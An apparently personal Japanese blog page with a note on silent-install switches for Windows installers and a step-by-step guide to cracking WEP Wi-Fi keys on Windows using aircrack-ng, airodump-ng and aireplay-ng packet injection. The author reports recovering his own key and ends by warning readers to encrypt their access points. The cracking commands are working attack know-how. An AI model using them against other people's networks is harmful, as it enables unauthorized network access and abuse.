忍者ブログ
 >admin |  >entry |  yukku++Blog 
×

[PR]上記の広告は3ヶ月以上新規記事投稿のないブログに表示されています。新しい記事を書く事で広告が消えます。

■ Inno Setup
/SILENT , /VERYSILENT
これではインストールを続行するかどうかを尋ねるダイアログが表示される。
代わりに以下のスイッチを用いることで回避。
setup.exe /VERYSILENT /SP-
セットアップの完了後、そのプログラムを開こうとするものがある。
その場合 Windows XP に組み込まれている Taskkill を用いる。

バッチファイルコードの例:
ECHO.
ECHO Installing APPLICATION
ECHO Please wait...
start /wait APPLICATION.exe /VERYSILENT /SP-

ECHO.
ECHO Killing APPLICATION process
taskkill.exe /F /IM APPLICATION.exe
ECHO.

Inno Setup の判別方法

セットアッププログラムを実行し、最初に表示されるウインドウの左上のアイコンをクリック。
そしてドロップダウンメニューから About Setup... をクリック。

■ Installshield

setup.iss を作成する必要がある。

コマンドプロンプトから、-R (大文字小文字を区別)スイッチをつけてセットアッププログラムを実行。
Setup.exe -R
通常のセットアップ画面が表示される。
"Restart the computer now(今すぐコンピュータを再起動する)"オプションを選択しないこと。

インストール完了後、C:Windows(または C:WINNT)ディレクトリの setup.iss をコピー、
セットアップファイルと同じディレクトリに置く。

以下のようにしてサイレントセットアップを開始:
start /wait Setup.exe -s -f1"setup.iss"
InstallShield パッケージの確認方法

Setup.exe ファイルのプロパティに "InstallShield (R) Setup Launcher" などの表示がある。
または setup.iss が存在していれば InstallShield パッケージである。

■ Windows Installer

Windows Installer かどうかはファイルの拡張子(*.msi)で見分ける。
/QB と /QN スイッチを使用します。

/qb 基本的なプログレスバーをウインドウに表示。
/qn 何も表示せずに、インストールをバックグラウンドで行う。

リブートからのアプリケーションの無効化

自動的にリブートからアプリケーションを無効にするためには、
REBOOT=Suppress を引用符で囲んで /qn または /qb の隣に記述する。
setup.msi "/qn REBOOT=Suppress"
セットアップファイルには /s/v/qn を用いるものもある。
setup.exe /s /v"/qn REBOOT=Suppress"
■ Wise Installer
/s
Setup.exe /s
PR

■Windows上で動かす目的
もちろんLinux上で動かすのが一番良いし、安定している。
だけど普段使うのはWindows。Linuxもちょっとかじったけどイマイチ常用には…。
だったらWindowsで動かせれば一番いい。ってことでトライ。
現状の環境を維持したままで行える。

Windows Tutorial
http://www.aircrack-ng.org/doku.php?id=windows-tutorial&rev=1186070726

ここを参照して、やってみた。

■必要なもの

  • CommView for WiFi * http://www.tamos.com/products/commwifi/
  • aircrack-ng-1.0-beta1-win.zip * http://www.aircrack-ng.org/doku.php
  • NetStumbler * http://www.netstumbler.com/
  • commview.dll * ググる。
  • ca2k.dll * CommView for WiFi についてくる。
  • aircrack-ng対応の無線LANカード等 * 以下参照
二つのDLLを aircrack-ng/bin に入れる。
Which is the best card to buy ?
この表のものが手に入るのが一番いい。
Netgear あたりが入手しやすいかも。
beta1-win.zip にはバイナリが入っているのでコンパイルは飛ばします。

■大体の手順

1.CommView for Wifi のドライバで無線Lanカードをインストール。(net5211.inf)

2.airserv-ng で 各種ツールをWindows上で利用できる状態にする。

airserv-ng [opts]

ex) airserv-ng -d commview.dll -p [port] -c [channel]
[port]、[channel]は任意。

3.NetStumbler でMACやESSIDやらCHを確認する。

4.airodump-ng で IV のキャプチャ開始。

airodump-ng [options] [interface]

ex) airodump-ng 127.0.0.1:[port] -a --bssid [enemymac] -c [ch] -w output

5.aireplay-ng でパケットインジェクション。

associatedされた状態にする。

ex) aireplay-ng.exe 127.0.0.1:[port] -1 60 -q 10 -a [enemymac] -h [yourmac] -e [ESSID]

パケットを送りつける。

ex) aireplay-ng.exe 127.0.0.1:[port] --arpreplay -b [enemymac] -h [yourmac] -e [ESSID]

6.aircrack-ng でIVを解析。DATA を 200,000以上は集める必要があると記述されている。
airodump と aircrack を同時に動作させ、キャプチャしながら解析もできる。

aircrack-ng [options]

ex) aircrack-ng *.cap

7.しばらく待っていると… (゚Д゚)ウマー

ex) は自分用。
http://www.aircrack-ng.org/doku.php#documentation
を参照して自分なりに書き換えるとなお良い。
とはいったものの自分でも良くわかっていないが…。

自分のWEPのキー復元はできた。なんと簡単。5文字だったからすぐだった。
以前WPAに変えたときは接続が不安定になったので結局危険を顧みず
WEPで現状維持。うーん、へんなことされなきゃいいけど。
WPAとかにするとか、とにかくWEP以外のセキュリティを使ったほうが無難かも。
それでもクラックされないという保障は無いけど。

とにかくWEPは以外に簡単にクラックできちゃうってこと。
クラックされると誰かが自分のアクセスポイントを利用して、踏み台にされるかもってこと。
そうすると、たとえばあなたの家から大量のスパムメールが送られたり、不正な接続の中継、はたまた、詐欺行為の隠れ蓑にされかねないわけだ。
なのに、パスワードの設定すらしていない野良APは結構あったりする。
せめて暗号化だけはしておいたほうがいいと思いますよ。
注意喚起的な意味でちょっとだけ書いておくことにする。

HOME  | 
プロフィール
Name :
yukku
カレンダー
05 2024/06 07
S M T W T F S
1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30
ブログ内検索
Twitter
Ads
アクセス解析
忍者ブログ [PR]